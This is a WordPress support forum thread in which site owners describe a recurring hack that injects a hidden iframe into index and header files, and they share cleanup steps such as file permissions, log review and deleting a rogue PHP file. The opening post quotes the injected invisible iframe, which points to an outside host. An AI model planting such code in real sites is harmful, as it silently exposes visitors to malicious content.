Title: iframe hack
Last modified: August 19, 2016

---

# iframe hack

 *  [liltbrockie](https://wordpress.org/support/users/liltbrockie/)
 * (@liltbrockie)
 * [16 years, 11 months ago](https://wordpress.org/support/topic/iframe-hack/)
 * I keep getting hacked.
 * The hack adds the following code to various files in my forum… mainly index.php
   and index.html files
 *  <iframe src=”[http://xf7.in:8080/index.php&#8221](http://xf7.in:8080/index.php&#8221);
   width=100 height=167 style=”visibility: hidden”></iframe>
 * How can I prevent this please?
    Renaming the tables I suspect? Dont really want
   to do this though as I fear it will ruin some plug in functionality

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [dagon-design](https://wordpress.org/support/users/dagon-design/)
 * (@dagon-design)
 * [16 years, 11 months ago](https://wordpress.org/support/topic/iframe-hack/#post-1153587)
 * I would check your WordPress files to make sure they are set to read-only. If
   the config.php file, for example, has write access, it would be possible for 
   someone to append the iframe code to it.
 * If you use an FTP client to upload files, it should be able to show you the permissions,
   and you can find out what file that code is being added to.
 *  [jenszing](https://wordpress.org/support/users/jenszing/)
 * (@jenszing)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack/#post-1153730)
 * I have been battling an I frame hack for 2 weeks. I’ve done a complete sweep 
   of my computer, changed the passwords and deleted any rogue code i could find.
   Interestingly enough it doesnt appear on my index.php pages as it seems to in
   a lot of the other posts I am reading on the forum. It is – as far as I can detect-
   only on some unpublished pages that we are working on for future publications.
   I am at the end of my rope. If someone out there is familiar with this hack and
   can fix it – please contact me for possible consulting work for hire . my email
   address is [montsalg@hotmail.com](https://wordpress.org/support/topic/iframe-hack/montsalg@hotmail.com?output_format=md)
 *  [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
 * (@rvoodoo)
 * [16 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack/#post-1153731)
 * I just had an iframe hack. I checked my server logs for an entry that matched
   the time that my header.php file was altered. When I found that entry, it pointed
   to a rogue php file. That file was in my wp-content/uploads folder of an entirely
   different wp install. It was in a folder inside the wp-content/uploads/2008/08.
   I deleted that file and haven’t had a problem since.
 * Of course, since I didn’t put that file there, I had another problem. Followed
   the Hardening WordPress Guide, manually checked every file and directory on my
   server, etc. Seems like I’m safe, for now

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘iframe hack’ is closed to new replies.

## Tags

 * [iframe hack](https://wordpress.org/support/topic-tag/iframe-hack/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 4 participants
 * Last reply from: [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
 * Last activity: [16 years, 7 months ago](https://wordpress.org/support/topic/iframe-hack/#post-1153731)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics